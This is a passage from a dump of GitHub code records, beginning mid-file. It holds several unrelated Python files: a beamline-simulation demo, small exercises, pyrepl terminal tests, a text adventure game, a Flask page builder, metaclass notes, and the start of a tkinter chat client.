查看磁场分布\n b = beamline.magnetic_field_bz_along(step=20*MM)\n # Plot2.plot(b,describe='r-')\n # Plot2.show()\n\n # ------------------------------ 下面简单介绍 Beamline 的各个函数 --------------------- #\n\n # Beamline 是 Line2, Magnet, ApertureObject 三个类的子类\n # 因此这三个父类的函数都可以在 Beamline 对象中使用,如 magnetic_field_at()\n\n # Beamline 的直接构造函数 Beamline() 不推荐使用\n # 它传传入一个 Line2 对象当作设计轨道 trajectory\n # 构造后,轨道上不存在磁场\n\n # Magnet 相关的函数\n # magnetic_field_along\n # magnetic_field_bz_along\n # graident_field_along\n # second_graident_field_along\n\n # ApertureObject 相关的函数\n # is_out_of_aperture\n # trace_is_out_of_aperture 新增函数,用于确定一段轨迹 P3 数组,是否超出孔径\n\n # Line2 相关的函数\n # get_length\n # point_at\n # direct_at\n\n\n # 函数 track_ideal_particle 用于理想粒子的粒子跟踪\n # 参数如下\n # kinetic_MeV 粒子动能,单位 MeV\n # s 起点位置,以束线起点处 s 距离作为粒子起点。默认 0,即在束线的起点\n # length 运动路程。默认运动到束线尾部\n # footstep 粒子运动步长,默认 5*MM\n # 返回粒子运动轨迹,P3 数组\n track_ideal_p = beamline.track_ideal_particle(kinetic_MeV=215)\n # Plot3.plot_beamline(beamline)\n # Plot3.plot_p3s(track_ideal_p)\n # Plot3.show()\n\n\n # 函数 track_phase_ellipse() 束流跟踪,运行一个相椭圆\n # 返回一个长度 2 的元组\n # 元素元素分别表示相空间 x-xp 平面和 y-yp 平面上粒子投影(单位 mm / mrad),元素类型为 P2 数组\n # 参数如下:\n # x_sigma_mm σx 单位 mm\n # xp_sigma_mrad σxp 单位 mrad\n # y_sigma_mm σy 单位 mm\n # yp_sigma_mrad σyp 单位 mrad\n # delta 动量分散 单位 1\n # particle_number 粒子数目\n # kinetic_MeV 动能 单位 MeV\n # s 起点位置\n # length 粒子运行长度,默认运行到束线尾部\n # footstep 粒子运动步长\n # concurrency_level 并发等级(使用多少个核心进行粒子跟踪)\n # report 是否打印并行任务计划\n \n xxp,yyp = beamline.track_phase_ellipse(\n x_sigma_mm=3.5,\n xp_sigma_mrad=7.5,\n y_sigma_mm=3.5,\n yp_sigma_mrad=7.5,\n delta=0.0,\n particle_number=6, # 粒子数目\n kinetic_MeV=250,\n s = 0,\n length=beamline_length_part1,\n footstep=20*MM, # 粒子运动步长\n concurrency_level=16\n )\n\n # Plot2.plot_p2s(xxp,describe='r.')\n # Plot2.plot_p2s(yyp,describe='b.')\n # Plot2.show()\n\n # 内部类 __BeamlineBuilder 用于方便的构建 beamline\n # 构建 beamline 的步轴为\n # 第一步 指定起点\n beamline = Beamline.set_start_point(P2.origin())\n # 第二步 设定第一条偏移段,方向和长度\n beamline = beamline.first_drift(direct=P2.x_direct(),length=1)\n # 第三步 不断地尾解元件,可以是以下四种\n # append_drift\n # append_qs\n # append_dipole_cct\n # append_agcct\n # 下面一一介绍\n\n # 函数 append_drift 尾接一条漂移段\n # 参数只有一个 length,即漂移段的长度\n\n # 函数 append_qs 尾接一个 qs 磁铁\n # 参数为 \n # length: float QS 磁铁长度\n # gradient: float 梯度 T/m\n # second_gradient: float 二阶梯度(六极场) T/m^2\n # aperture_radius: float 半孔径 单位 m\n\n # 函数 append_dipole_cct 尾接一个 二极CCT 磁铁\n # 参数如下\n # big_r: float 偏转半径\n # small_r_inner: float 内层半孔径\n # small_r_outer: float 外层半孔径\n # bending_angle: float 偏转角度(正数表示逆时针、负数表示顺时针)\n # tilt_angles: List[float] 各极倾斜角\n # winding_number: int 匝数\n # current: float 电流\n # disperse_number_per_winding: int 每匝分段数目,越大计算越精确\n\n # 函数 append_agcct 尾接一个 四极CCT 磁铁\n # 参数为 \n # big_r: float 偏转半径,单位 m\n # small_rs: List[float] 各层 CCT 的孔径,一共四层,从大到小排列。分别是二极CCT外层、内层,四极CCT外层、内层\n # bending_angles: List[float] 交变四极 CCT 每个 part 的偏转半径(正数表示逆时针、负数表示顺时针),要么全正数,要么全负数。不需要传入二极 CCT 偏转半径,因为它就是 sum(bending_angles)\n # tilt_angles: List[List[float]] 二极 CCT 和四极 CCT 的倾斜角,典型值 [[30],[90,30]],只有两个元素的二维数组\n # winding_numbers: List[List[int]], 二极 CCT 和四极 CCT 的匝数,典型值 [[128],[21,50,50]] 表示二极 CCT 128匝,四极交变 CCT 为 21、50、50 匝\n # currents: List[float] 二极 CCT 和四极 CCT 的电流,典型值 [8000,9000]\n # disperse_number_per_winding: int 每匝分段数目,越大计算越精确\n\n\n\n\n # 函数 __str__ 将 beamline 转为字符串\n print(beamline) # beamline(magnet_size=0, traj_len=1.0)\n","repo_name":"madokast/cctpy","sub_path":"final_code/demos/A15束线beamline示例.py","file_name":"A15束线beamline示例.py","file_ext":"py","file_size_in_byte":18414,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8146696113","text":"import math\nn = int(input(\"n = \"))\na = [float(input(\"a[{0}] = \".format(i)))for i in range(n)]\nprint(\"Масив a ={0}\".format(a))\nb = []\nc = []\nfor i in range(len(a)):\n if math.fabs(a[i]) <= 1:\n b.append(a[i])\n else:\n c.append(a[i])\nb+=c\na=b\nprint(\"Перетворений масив a ={0}\".format(a))","repo_name":"KYUUBI-K/Labs-from-python","sub_path":"Лаб.6/завдання 4.py","file_name":"завдання 4.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38351318205","text":"import math\n\n\ndef main(n):\n if n == 0:\n return -0.12\n elif n >= 1:\n return main(n - 1) - 63 * (math.cos(1 - (main(n - 1)) ** 3 / 81 - (main(n - 1)) ** 2)) ** 2\n return 0\n\n\ndef main2(n):\n res = []\n res.append(-0.12)\n for i in range(1, n + 1):\n temp = res[i - 1]\n res.append(temp - 63 * (math.cos(1 - temp ** 3 / 81 - temp ** 2)) ** 2)\n return res[n]\n\nprint(main(2)==main2(2))\nprint(main(8)==main2(8))\nprint(main(2))\nprint(main(8))","repo_name":"IvanCherepanov/kispython","sub_path":"fourth.py","file_name":"fourth.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"25246902445","text":"\nimport time\nimport unittest\n\nimport gobject\nimport vte\n\nimport pyrepl.reader\nimport pyrepl.unix_console\n\n\nclass TestWrappingLongLines(unittest.TestCase):\n\n # Test that Reader wraps lines correctly before passing them to\n # UnixConsole.\n\n def make_example_reader(self):\n console = pyrepl.unix_console.UnixConsole()\n reader = pyrepl.reader.Reader(console)\n reader.ps1 = \"foo$\"\n reader.prepare()\n reader.restore() # Don't screw up terminal\n reader.console.width = 10\n reader.buffer = list(\"01234567890123456789\")\n return reader\n\n def check_output(self, reader, lines):\n for line in lines:\n assert len(line) <= reader.console.width\n # Check cursor position consistency.\n for index, char in enumerate(\"\".join(reader.buffer)):\n x, y = reader.pos2xy(index)\n self.assertEquals(lines[y][x], char)\n\n def test_wrapping(self):\n reader = self.make_example_reader()\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"foo$01234\\\\\", \"567890123\\\\\", \"456789\"])\n self.check_output(reader, lines)\n\n def test_wrapping_without_backslashes(self):\n reader = self.make_example_reader()\n reader.wrap_marker = \"\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"foo$012345\", \"6789012345\", \"6789\"])\n self.check_output(reader, lines)\n\n def test_wrapping_long_prompts(self):\n reader = self.make_example_reader()\n reader.wrap_marker = \"\"\n reader._ps1 = \"0123456789foo$\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"0123456789\",\n \"foo$012345\", \"6789012345\", \"6789\"])\n self.check_output(reader, lines)\n\n def test_wrapping_status_message(self):\n reader = self.make_example_reader()\n reader.msg = \"status1status2status3status4\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"foo$01234\\\\\", \"567890123\\\\\", \"456789\",\n \"status1st\\\\\", \"atus2stat\\\\\", \"us3status\\\\\", \"4\"])\n self.check_output(reader, lines)\n\n reader.msg_at_bottom = False\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"status1st\\\\\", \"atus2stat\\\\\", \"us3status\\\\\", \"4\",\n \"foo$01234\\\\\", \"567890123\\\\\", \"456789\"])\n self.check_output(reader, lines)\n\n # There should be no empty line when the message exactly fills\n # the last line.\n reader.msg = \"status1status2status3status\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"status1st\\\\\", \"atus2stat\\\\\", \"us3status\",\n \"foo$01234\\\\\", \"567890123\\\\\", \"456789\"])\n self.check_output(reader, lines)\n\n\nclass VTEConsole(pyrepl.unix_console.UnixConsole):\n\n def __init__(self, terminal):\n self._terminal = terminal\n pyrepl.unix_console.UnixConsole.__init__(self, f_in=None, term=\"xterm\")\n\n # TODO: Don't use __ attributes in UnixConsole\n def flushoutput(self):\n for text, iscode in self._UnixConsole__buffer:\n self._terminal.feed(text.encode(self.encoding))\n del self._UnixConsole__buffer[:]\n\n def _update_size(self):\n pass\n\n\ndef get_vte_text(vte_terminal):\n # VTE updates the terminal in the event loop after a\n # non-configurable timeout, so we have to work around that.\n time.sleep(0.05)\n while gobject.main_context_default().iteration(False):\n pass\n return vte_terminal.get_text(lambda *args: True)\n\n\nclass TestUnixConsole(unittest.TestCase):\n\n def test_soft_newlines(self):\n terminal = vte.Terminal()\n terminal.set_size(10, 10)\n console = VTEConsole(terminal)\n console.width = 10\n console.height = 10\n console.prepare()\n\n # Check that a soft newline occurs.\n console.refresh([\"0123456789\",\n \"abcdefg\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"0123456789abcdefg\" + \"\\n\" * 9)\n\n # Check switching from soft newline to hard newline.\n # The chars \"89\" should disappear from the display.\n console.refresh([\"01234567\",\n \"abcdefg\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"01234567\\nabcdefg\" + \"\\n\" * 9)\n\n # Test shortening the last line.\n console.refresh([\"0123456789\",\n \"abcd\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"0123456789abcd\" + \"\\n\" * 9)\n\n def test_soft_newlines_positioning(self):\n terminal = vte.Terminal()\n terminal.set_size(10, 10)\n console = VTEConsole(terminal)\n console.width = 10\n console.height = 10\n console.prepare()\n # Check that positioning is correct when starting from the\n # middle of the terminal.\n terminal.feed(\"\\n\\n\")\n\n console.refresh([\"012345678\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\\n012345678\" + \"\\n\" * 8)\n self.assertEquals(terminal.get_cursor_position(), (0, 2))\n\n # pyrepl's Reader produces empty lines.\n console.refresh([\"0123456789\", \"\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\\n0123456789\" + \"\\n\" * 8)\n self.assertEquals(terminal.get_cursor_position(), (0, 2))\n\n console.refresh([\"0123456789\", \"a\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\\n0123456789a\" + \"\\n\" * 7)\n self.assertEquals(terminal.get_cursor_position(), (0, 2))\n\n def test_bottom_of_screen(self):\n # We should be able to write in the bottom line of the screen.\n terminal = vte.Terminal()\n terminal.set_size(10, 10)\n console = VTEConsole(terminal)\n console.width = 10\n console.height = 10\n console.prepare()\n terminal.feed(\"\\n\" * 20)\n console.refresh([\"hello\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\" * 9 + \"hello\\n\")\n console.refresh([\"hello\", \"\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\" * 8 + \"hello\\n\\n\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mseaborn/pyrepl","sub_path":"test_wrapping.py","file_name":"test_wrapping.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23600921091","text":"fileName = \"A-large\"\r\n\r\ninputFile = open( fileName + \".in\", \"r\" )\r\noutputFile = open( fileName + \".out\", \"w\" )\r\n\r\nnumCases = int(inputFile.readline())\r\n\r\nfor caseNumber in range(1, numCases + 1):\r\n\r\n input_s = inputFile.readline()\r\n \r\n numSnappers = int(input_s.split()[0])\r\n numSnaps = int(input_s.split()[1])\r\n \r\n mask = (2**numSnappers) - 1\r\n \r\n if mask == numSnaps & mask:\r\n answer = \"ON\"\r\n else:\r\n answer = \"OFF\"\r\n\r\n # Output the results\r\n outputFile.write( \"Case #%d: %s\\n\" % (caseNumber, answer) )\r\n\r\n# Close the streams\r\ninputFile.close()\r\noutputFile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_53/456.py","file_name":"456.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26012893453","text":"from sys import exit\nfrom random import randint\nfrom textwrap import dedent\n\n# this creats an object that contains the state on the game\nclass Player(object):\n def __init__(self):\n self.hunger = 50\n self.thirst = 50\n self.food_raw = 0\n self.food_cooked = 5\n self.wood = 0\n self.location = 'string'\n self.mine_equip = False\n self.bow = False\n self.diamonds = 0\n self.coal = 0\n self.gold = 10\n self.canteen = 0\n self.water = 0\nclass Admin(object):\n def __init__(self):\n self.hunger = 100\n self.thirst = 50\n self.food_raw = 100\n self.food_cooked = 100\n self.wood = 100\n self.location = 'string'\n self.mine_equip = False\n self.bow = False\n self.diamonds = 100\n self.coal = 100\n self.gold = 10000000\n self.canteen = 1000\n self.water = 1000\n# takes the string and uses it to get a class and call its enter method\nclass Engine(object):\n def __init__(self, scene_map):\n self.scene_map = scene_map\n\n def play(self):\n current_scene = self.scene_map.opening_scene()\n last_scene = self.scene_map.next_scene('finale')\n while current_scene != last_scene:\n next_scene_name = current_scene.enter()\n current_scene = self.scene_map.next_scene(next_scene_name)\n current_scene.enter()\n\n#this is the overarching scene that contains the genaric commands\nclass Scene(object):\n def enter(self):\n exit(1)\n#lets the player eat\n def eat(self):\n if player.food_cooked > 0:\n if player.hunger > 200:\n print(\"you eat food\")\n player.food_cooked -= 1\n player.hunger += 10\n else:\n print('you are full')\n# displays the current status of the player\n def stats(self):\n print(dedent(f\"\"\"\n gold: {player.gold}\n Hunger:{player.hunger}\n Thirst:{player.thirst}\n Food:cooked:{player.food_cooked} raw:{player.food_raw}\n Wood:{player.wood}\n diamonds: {player.diamonds}\n coal:{player.coal}\n \"\"\"))\n if player.canteen == True:\n print(f'Canteen: {player.water} / {player.canteen}')\n\n# this is a work in progress\nclass Battle(Scene):\n pass\n\n#start screen\nclass Game_start(Scene):\n def enter(self):\n print(dedent(\"\"\"\n Exitio Magicae\n The game of magic death\n start\n info\n quit\n \"\"\"))\n chose = input()\n if str.lower(chose) == 'start':\n print('Game Start')\n return 'intro'\n elif str.lower(chose) == 'quit':\n print('y')\n exit(1)\n elif str.lower(chose) == 'info':\n print(dedent(\"\"\"\n you can type thease comands at any time:\n eat\n stats\n quit\n\n \"\"\"))\n return 'game_start'\n# intro to world and maby combat totorial\nclass Intro(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n :o-|-[\n You awaken to a sound of crumpling leaves.\n infront of you is a man waring a top hat.\n \"Hello there my boy I'm sorry to awaken but this is not a charity house\"\n you realise that you fell aslep out side the store.\n you apologise to the man and stand up only to get smashed into the wall by a skeloton\n what will you do?\n \"\"\"))\n if choice == 'fight':\n print('sorry this option is not availible right now so you just die')\n return 'death'\n elif choice == 'skip':\n print(dedent(\"\"\"\n you quickly convince the skelotons\n that you are so strong they needent bother\n The mayor then gifts you a cabin in the woods near by as thanks\n you diside to rest for a bit by the magic fire outside\"\"\"))\n return 'campfire'\n else:\n print('wot')\n return 'intro'\n# base of of the game inbetween the major points of intrest\nclass Campfire(Scene):\n def enter(self):\n choice = input(dedent(f\"\"\"\n This is the campfire the fire is lit by a blue atherial fire.\n you see paths to the east north and west.\n there is a cabin behind you\n \"\"\"))\n\n if choice == 'east' or choice == 'East':\n print('you take the eastern road')\n player.hunger -= 5\n player.thirst -= 10\n return 'east'\n elif choice == 'north' or choice == 'North':\n print('you take the northern trail')\n player.hunger -= 5\n player.thirst -= 5\n return 'north'\n elif choice == 'West' or choice == 'west':\n print('you take the western path')\n player.hunger -= 5\n player.thirst -= 5\n return 'west'\n elif choice == 'cabin' or choice == 'Cabin':\n print('you go to the cabin')\n return 'cabin'\n elif choice == 'cook' or choice == 'Cook':\n if player.food_raw > 0:\n player.food_raw -= 1\n player.food_cooked += 1\n else:\n print(\"you do not have any raw food\")\n return 'campfire'\n elif choice == 'stats' or choice == 'check':\n self.stats()\n return 'campfire'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'campfire'\n elif choice == 'quit':\n exit(1)\n else:\n print(\"you don't know how to do that\")\n return 'campfire'\n\n# you can cook here does nothing for now\nclass Cabin(Scene):\n def enter(self):\n choice = input(dedent(f\"\"\"\n You enter the cabin. It's old and there is not much inside.\n There is a bed and a fire place\n \"\"\"))\n if str.lower(choice) == 'cook':\n if player.food_raw > 0:\n player.food_raw -= 1\n player.food_cooked += 1\n else:\n print(\"you do not have any raw food\")\n return 'cabin'\n elif choice == 'rest' or choice == 'Rest':\n print(\"you sleep\")\n return 'cabin'\n elif choice == 'exit' or choice == 'leaves':\n print('you leave the cabin')\n return 'campfire'\n elif choice == 'stats' or choice == 'check':\n self.stats()\n return 'cabin'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'cabin'\n elif choice == 'quit':\n exit(1)\n else:\n print(\"no that would be stupid\")\n return 'cabin'\n# hunting and mining area\nclass North(Scene):\n def enter(self):\n print(dedent(f\"\"\"\n You go down the trail. it goes on for a while.\n eventualy you arive at the a small mining camp.\n the woods around here look full of deer\n \"\"\"))\n if player.mine_equip == False:\n print('There is a pickaxe and a shovel')\n choice = input()\n if str.lower(choice) == 'hunt':\n player.hunger -= 5\n player.thirst -= 5\n if player.bow == True:\n print('You enter the woods with your bow and begin hunting')\n pnumber = input('pick a number 1 through 4')\n random = randint(1, 4)\n fnumber = randint(1, 3)\n if pnumber == random:\n player.food_raw += fnumber\n print(f'you were succesful you gain {fnumber} food')\n if pnumber != random:\n print('you fail to catch anything')\n return 'north'\n else:\n print('you dont have a bow and cant hunt.')\n return 'north'\n elif str.lower(choice) == 'mine':\n if player.mine_equip == True:\n print('You venture into the moutain caves and begin to mine')\n mnumber = randint(1, 20)\n if mnumber == 20:\n player.hunger -= 5\n player.thirst -= 5\n print('You found a diamond. Congrats!')\n player.diamonds += 1\n\n elif mnumber > 5:\n player.hunger -= 5\n player.thirst -= 5\n print('You got some coal. Neat!')\n player.coal += 1\n\n else:\n player.hunger -= 10\n player.thirst -= 10\n print('you found some rocks. be mad')\n else:\n print('you do not have a pick')\n return 'north'\n elif str.lower(choice) == 'pick up' or str.lower(choice) == 'pick up pickaxe':\n if player.mine_equip == False:\n print('you pickup the shovel and pickaxe and put them on your back')\n player.mine_equip = True\n return 'north'\n else:\n print('you already took them')\n return 'north'\n elif str.lower(choice) == 'back' or str.lower(choice) == 'leave':\n print('you return to your fire')\n return 'campfire'\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'north'\n else:\n print('not an option')\n return 'north'\n\n#work in progress\nclass West(Scene):\n def enter(self):\n print(\"no you can't go here... yet im working on it\")\n return 'campfire'\n\n# town with branching path to the buildings\nclass East(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n You enter the town. You see some buildings.\n a blacksmith\n a market\n a well\n \"\"\"))\n if str.lower(choice) == 'blacksmith':\n print('you go to the blacksmith')\n return 'blacksmith'\n elif str.lower(choice) == 'store' or str.lower(choice) == 'market':\n print('you go to the market')\n return 'market'\n elif str.lower(choice) == 'well' or str.lower(choice) == 'go to well':\n print('you walk to the well')\n return 'well'\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'east'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'east'\n elif str.lower(choice) == 'quit':\n exit(1)\n\n else:\n print(\"thats not a great thing to do\")\n return 'east'\n# the well where the player can fill a canteen or drink water\nclass Well(Scene):\n def enter(self):\n print('you arive at the well what will you do')\n fill = input()\n if str.lower(fill) == 'drink':\n if player.thirst < 100:\n print('you drink some water')\n while player.thirst < 100:\n player.thirst += 1\n return 'well'\n elif str.lower(fill) == 'fill':\n if player.canteen > 0:\n print('you use the well to fill your canteen')\n while player.water < player.canteen:\n player.water += 1\n return 'well'\n else:\n print('you dont own a canteen')\n return 'well'\n elif str.lower(fill) == 'leave':\n print('you go back to town square')\n return 'east'\n else:\n print('eather drink fill or just leave')\n return 'well'\n\n#place to buy stuff\nclass Market(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n you enter the market and go to a stall\n he has some items out for sail\n an apple(1 cooked food): 5g\n Meat(3 cooked food): 10g\n health potion: 1000000g\n \"\"\"))\n if str.lower(choice) == 'apple' or str.lower(choice) == 'buy apple':\n if player.gold >= 5:\n player.gold -= 5\n player.food_cooked += 1\n print('you buy an apple')\n else:\n print('you need more gold')\n return 'market'\n elif str.lower(choice) == 'meat' or str.lower(choice) == 'buy meat':\n if player.gold >= 10:\n player.gold -= 10\n player.food_cooked += 3\n print(\"you buy some meat\")\n else:\n print('you need more gold')\n return 'market'\n elif str.lower(choice) == 'health potion' or str.lower(choice) == 'buy health potion':\n if player.gold >= 10:\n player.gold -= 10\n player.food_cooked += 100000000000\n print(\"this doesn't do anything yet so please enjoy the infinite food\")\n else:\n print('no')\n return 'market'\n elif str.lower(choice) == 'leave':\n print('you go back to the square')\n return 'east'\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'east'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'east'\n elif str.lower(choice) == 'quit':\n exit(1)\n else:\n print('no thats not right')\n return 'east'\n\n#this is where tools are bought and minarals are sold\nclass Blacksmith(Scene):\n def enter(self):\n choice = input(dedent(f\"\"\"\n you enter the blacksmith.\n As you enter the blacksmith smiles warmly and asks\n \"what can I do you for\"\n he layes out his wares with the prises attached\n upgraid canteen(capacity {player.canteen + 10}):100g\n Bow(lets you hunt): 300g\n it also has a note that saids he will buy any gems or coal off you\n \"\"\"))\n if str.lower(choice) == 'canteen' or str.lower(choice) == \"buy canteen\":\n if player.gold >= 100:\n player.gold -= 100\n player.canteen += 10\n print(dedent(\"\"\"you buy a upgraid to your canteen.\n Its the same size some how and you have no clue how on earth that works.\n The blacksmith just winks at you\"\"\"))\n else:\n print('not enough money')\n return 'market'\n elif str.lower(choice) == 'bow' or str.lower(choice) == \"buy bow\":\n if player.bow == True:\n print('you already have one')\n elif player.gold >= 300:\n player.gold -= 300\n player.bow = True\n print('you now have a bow. Now go hunt.')\n else:\n print('not enough money')\n return 'market'\n elif str.lower(choice) == 'sell':\n print('what would you like to sell')\n minaral = input()\n if str.lower(minaral) == 'diamond' or str.lower(minaral) == 'diamonds' :\n if player.diamonds > 0:\n player.diamonds -= 1\n player.gold += 100\n print('you sell a diamond ')\n else:\n print('YOU HAVE NOT ENOUGH MINARALS')\n\n elif str.lower(minaral) == 'coal':\n if player.coal > 0:\n player.coal -= 1\n player.gold += 10\n print('you sell coal for 10 gold')\n else:\n print('YOU HAVE NOT ENOUGH MINARALS')\n else:\n print('thats not a minaral')\n return 'blacksmith'\n\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'east'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'east'\n elif str.lower(choice) == 'quit':\n exit(1)\n else:\n print('no thats not right')\n return 'east'\n\nclass Finale(Scene):\n pass\n\n# this one doesn't come up much yet\nclass Death(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n you have died not bit suprise\n Play Again?\n \"\"\"))\n if str.lower(choice) == 'yes' or str.lower(choice) == 'play again':\n player = Player()\n return 'into'\n if str.lower(choice) == 'no' or str.lower(choice) == 'quit':\n quit(1)\n else:\n print('what')\n return 'death'\n\n#this creats a map for it\nclass Map(object):\n #this is a list of all the scenes\n scenes = {\n 'game_start': Game_start(),\n 'intro': Intro(),\n 'campfire': Campfire(),\n 'cabin': Cabin(),\n 'north': North(),\n 'west': West(),\n 'east': East(),\n 'blacksmith': Blacksmith(),\n 'market': Market(),\n 'well': Well(),\n 'death': Death(),\n 'finale': Finale()\n }\n # this creates the object start scenes\n def __init__(self, start_scene):\n self.start_scene = start_scene\n # this creats next_scene for use\n def next_scene(self, scene_name):\n val = Map.scenes.get(scene_name)\n return val\n\n def opening_scene(self):\n return self.next_scene(self.start_scene)\n#I know this looks the same as the books but I tryed to make one and it just so happend to come out the same\n\nplayer = Player()\na_map = Map('game_start')\na_game = Engine(a_map)\na_game.play()\n","repo_name":"blong191/Exitio_Magicae","sub_path":"repetative_death.py","file_name":"repetative_death.py","file_ext":"py","file_size_in_byte":17323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11724299275","text":"import context\nimport lib.widgets.htmlwidgets as htmlwidgets\nimport css as css\nimport lib.ajax.ajax_aux as ajax_aux\n\ndef page_head():\n return \"\"\"\n\"\"\" + \\\n htmlwidgets.head(\"jQuery Example\", css=css.global_css()) + \\\n\"\"\"\n\n\"\"\"\n\ndef index_ajax_meta():\n return {\n 'route': '/_add_numbers',\n 'id_action': 'a#calculate',\n 'id_result': 'result',\n 'id_data': ['a', 'b'],\n 'id_result_hist': 'history',\n 'id_result_uses': 'nuses',\n 'id_rgb': 'rgb',\n 'id_calc_history_table': 'histtbl'\n }\n\ndef index_page():\n meta = index_ajax_meta()\n return page_head() +\\\n ajax_aux.get_ajax_index(meta) + \\\n \"\"+\\\n htmlwidgets.h1(\"jQuery Example\") + \\\n ajax_aux.numeric_boxes(meta['id_data']) + \" = \" + \\\n htmlwidgets.htmloutput(meta['id_result']) + \\\n ajax_aux.link(\"#\", \"calculate\", \"DO IT\") + \\\n htmlwidgets.htmlvaluebox(\"N uses\", meta['id_result_uses']) + \\\n htmlwidgets.div('', options={'id':'divtochange'},style={'height': '50px', 'width': '50px', 'background-color':'blue'})+\\\n htmlwidgets.h1(\"Session history\") + \\\n htmlwidgets.datatable(['a','b'],[],options={'id':meta['id_result_hist']})+\\\n htmlwidgets.htmloutput(meta['id_calc_history_table']) + \\\n \"\"\n","repo_name":"jpoffline/py-dev","sub_path":"webserver/app/flasksite/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4489154232","text":"#tiny class\n\n#type()动态创建\n#动态语言和静态语言最大的不同,就是函数和类的定义,不是编译时定义的,而是运行时动态创建的。\n\nclass Hello(object):\n\tdef hi(self,name = 'scott'):\n\t\tprint('hello , %s.'%name)\n\t\t\n#执行结果就是动态创建出一个 Hello 的 class 对象\nh = Hello()\nh.hi()\nprint(type(Hello))\nprint(type(h))\n#type()函数可以查看一个类型或变量的类型,Hello 是一个 class,它的\n#类型就是 type,而 h 是一个实例,它的类型就是 class Hello。\n#class 的定义是运行时动态创建的,而创建 class 的方法就是使用type()函数。\n#type()函数既可以返回一个对象的类型,又可以创建出新的类型,比如,\n\n#我们可以通过 type()函数创建出 Hello 类,而无需通过 classHello(object)...的定义:\ndef fn(self,name = 'scotte'):\n\tprint('adw %s' % name)\n\nhey = type('hey',(object,),dict(hello = fn))# 创建 hey class\nh = hey()\nh.hello()\nprint(type(hey))\nprint(type(h))\n\n\n\n\n\n\n# metaclass,直译为元类,简单的解释就是:必须根据 metaclass 创建出类,所以:先定义 metaclass,然后创建类。\n#连接起来就是:先定义 metaclass,就可以创建类,最后创建实例\n#,metaclass 允许你创建类或者修改类。换句话说,你可以把类看成是 metaclass 创建出来的“实例”。\n\n# metaclass 是类的模板,所以必须从`type`类型派生:\nclass ListMetaclass(type):\n\tdef __new__(cls,name,bases,attrs):\n\t\tattrs['add'] = lambda self ,value:self.append(value)\n\t\treturn type.__new__(cls,name,bases,attrs)\n\n\n#在定义类的时候还要指示使用 ListMetaclass 来定制类,传入关键字参数 metaclass:\nclass MyList(list,metaclass = ListMetaclass):\n\tpass\n\nprint(type(MyList))\nprint(type(MyList()))\n\n#ORM 全称“Object Relational Mapping”,即对象-关系映射,就是把关系\n#数据库的一行映射为一个对象,也就是一个类对应一个表,这样,写代码更简单,不用直接操作 SQL 语句。\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nikelily/PyLearn-Codes","sub_path":"160914/tinyClass.py","file_name":"tinyClass.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74368487555","text":"from tkinter import *\nimport socket\nimport threading\nfrom client import ClientEntity\nimport logging\n\t\t\nclass WidgetLogger(logging.Handler):\n\tdef __init__(self, widget):\n\t\tlogging.Handler.__init__(self)\n\t\tself.widget = widget\n\n\tdef emit(self, record):\n\t\tself.widget.insert(INSERT, record + '\\n')\n\t\t\nclass ClientGUI:\n\tdef __init__(self):\n\t\t\n\t\tself.main_gui = Tk()\n\t\tself.text_host = None\n\t\tself.text_port = None\n\t\tself.text_user = None\n\t\tself.btn_connect = None\n\t\tself.btn_send = None\n\t\tself.btn_disconnect = None\n\t\tself.text_message = None\n\t\tself.text_receiver = None\n\t\tself.client_entity = None\n\t\tself.text_recv = None\n\t\tself.wd = None\n\t\t\n\t\tself.init_component()\n\t\t\n\tdef start(self):\n\t\tself.main_gui.mainloop()\n\t\t\n\tdef init_component(self):\n\t\tself.main_gui.minsize(width=500, height=450)\n\t\tself.main_gui.resizable(width=False, height=False)\n\n\t\tself.text_host = Text(self.main_gui, width=20, 